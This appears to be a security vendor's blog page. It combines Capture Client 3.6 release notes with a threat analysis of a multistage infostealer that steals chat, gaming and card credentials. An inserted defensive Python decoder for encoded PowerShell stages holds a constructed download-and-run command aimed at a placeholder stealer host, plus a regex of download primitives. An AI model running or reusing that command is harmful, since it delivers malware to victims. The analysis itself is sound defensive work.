We’ve made some major improvements to the user experience by making multi-tenant management easier. Now you can quickly create, configure and enforce global policies and compliance based on user group, device and location. We’ve made it easier to create and deploy new tenants through the adoption of global baseline policies, while also offering the flexibility to build and deploy custom policies for specific tenants.

We added something we call Scope of Operations (or, simply put, “Scope”), which allows administrators to granularly pick their context of visibility and control. For example, you can immediately push agents out to all tenants or roll out in batches to better control field issues. You can also quickly add new security definitions to all tenants via the inheritance feature within global policies. The same would go for amending content filtering policies on the fly across all your tenants.

The features that are unlocked in 3.6 offer a better dashboard, enabling greater visibility into endpoint devices. The quick health snapshot offers a look at all tenants, displaying infections, vulnerabilities and active devices across one or multiple tenants. You can also view what content is accessed, what is blocked, and which web pages or users cause the most alerts.

This isn’t a comprehensive list of everything that went into the Capture Client 3.5 release — for more information, please read the blog.

What do you need to do to get on board with Capture Client 3.6? Just read this knowledgebase article on our Release of Capture Client 3.6, and all will be clear!

In the meantime, I invite you to read our solution brief, “A Unified-Client Platform for Enterprise-Grade Endpoint Security,” which is designed to help people understand how we are addressing the problems and threats facing the endpoint as people work from the office and their homes.

Multistage infostealer wants your Discord, Telegram, Steam Account Info

The SonicWall Capture Labs Threat Research team has analyzed a multi-stage infostealer. Where present on the victim’s machine, this Trojan steals cryptocurrency data, credit card information, FTP server credentials and account credentials for Discord, Telegram, Pidgin, Steam, NordVPN and Authy (2FA). It also steals the browser history and takes a screenshot of the desktop.

Infection Cycle:

The infection starts with a malicious Microsoft Excel spreadsheet containing an embedded Visual Basic for Applications (VBA) macro that, when executed, downloads a Trojan downloader.

This downloader drops a batch file, which then runs a series of commands.

It has the functionality to add a user account to Active Directory.

It also invokes PowerShell to run an encoded script; decoding the script reveals the URL from which the main infostealer Trojan is downloaded.

To ensure persistence, it adds the infostealer Trojan to startup.

All of these component files are deleted once the main infostealer has been downloaded.
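The encoded PowerShell stage is the point in this chain where an analyst can recover the download URL without running anything. The script below is an added example, not SonicWall’s code or the malware’s: it finds the -EncodedCommand argument in a captured command line, decodes it (base64 over UTF-16LE, the encoding PowerShell uses for that switch) and pulls out the URLs and download primitives. The command line and the host name in it are constructed for illustration; they are not indicators from this analysis.

```python
"""Decode a PowerShell -EncodedCommand stage and pull out download indicators.

Added example for the encoded PowerShell step described above; it is not
SonicWall's code and not the malware's. The command line and URL below are
constructed for illustration and are not indicators from the analysis.
"""
import base64
import binascii
import re

URL_RE = re.compile(r"(?:https?|ftp)://[^\s'\"`<>(),;]+", re.I)
# Primitives that commonly perform the download in a PowerShell stager.
DOWNLOAD_RE = re.compile(
    r"DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|"
    r"Invoke-RestMethod|\birm\b|Start-BitsTransfer|\bcurl\b|\bwget\b",
    re.I,
)


def encode_for_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 of UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: the shape of the command the batch stage would run.
# The host name uses the reserved .invalid TLD; it is a placeholder, not a C2.
SAMPLE_SCRIPT = (
    "(New-Object Net.WebClient).DownloadFile("
    "'http://stealer.example.invalid/Collector.exe', \"$env:TEMP\\svc.exe\"); "
    "Start-Process \"$env:TEMP\\svc.exe\""
)
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -Enc " + encode_for_powershell(SAMPLE_SCRIPT)


def is_encoded_flag(token: str) -> bool:
    """True for -EncodedCommand or an accepted shortening (-e, -ec, -enc, ...).

    PowerShell accepts any unambiguous prefix of a parameter name; this
    approximates that rule for the one parameter we care about."""
    name = token.lstrip("-/").lower()
    return name in ("e", "ec") or (len(name) >= 3 and "encodedcommand".startswith(name))


def extract_encoded_payload(cmdline: str):
    """Return the base64 blob that follows the encoded-command flag, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_flag(tok):
            return tokens[i + 1].strip("\"'")
    return None


def decode_powershell_b64(blob: str) -> str:
    """Decode an -EncodedCommand blob to script text.

    Restores stripped '=' padding, decodes as UTF-16LE, and falls back to
    UTF-8 for payloads that were base64-encoded from a plain byte string."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)
    try:
        raw = base64.b64decode(blob)
    except (binascii.Error, ValueError):
        return ""
    # UTF-16LE of an ASCII script has a NUL in every other byte; no NULs at all
    # (or an odd length) means the bytes were not UTF-16 and are read as UTF-8.
    if len(raw) % 2 or b"\x00" not in raw:
        return raw.decode("utf-8", errors="replace")
    return raw.decode("utf-16-le", errors="replace")


def analyse_cmdline(cmdline: str) -> dict:
    """Decode the encoded stage (if any) and report URLs and download primitives."""
    blob = extract_encoded_payload(cmdline)
    if blob is None:
        return {"encoded": False, "script": "", "urls": [], "download_primitives": []}
    script = decode_powershell_b64(blob)
    return {
        "encoded": True,
        "script": script,
        "urls": sorted(set(URL_RE.findall(script))),
        "download_primitives": sorted({m.lower() for m in DOWNLOAD_RE.findall(script)}),
    }


if __name__ == "__main__":
    result = analyse_cmdline(SAMPLE_CMDLINE)
    print("decoded script:", result["script"])
    print("download URLs :", result["urls"])
    print("primitives    :", result["download_primitives"])
```

Feed it the process command line from Sysmon event 1 or 4688 logs (powershell.exe with -e/-enc and a long base64 argument) to recover the stager without detonation; nested encodings or string-concatenated URLs will need a second pass on the decoded text.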

Once the main infostealer is executed, it creates a randomly named directory under the %Temp% folder where it logs all stolen information.

It creates a SQLite database file containing any credit card information found on the system.

It saves a screenshot of the victim’s desktop as a PNG file.

It also creates a file listing all recently visited websites, and another containing the rest of the stolen information: cryptocurrency data, accounts for popular chat applications such as Discord, Pidgin and Telegram, VPN and FTP server credentials, and account information for popular game libraries such as Steam.

All of these log files are deleted once they have been sent to the remote server.

During analysis we noted that one of the log titles read “Collector Project” and identified the build as “BETA BUILD v1.11”, which suggests this is an ongoing project for these cybercriminals and that we can expect further variants with more features and capabilities in the future.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Panda.B (Trojan)
  • GAV: Panda.K (Trojan)
  • GAV: Panda.STL (Trojan)

This threat is also detected by SonicWall Capture ATP with RTDMI and by the Capture Client endpoint solution.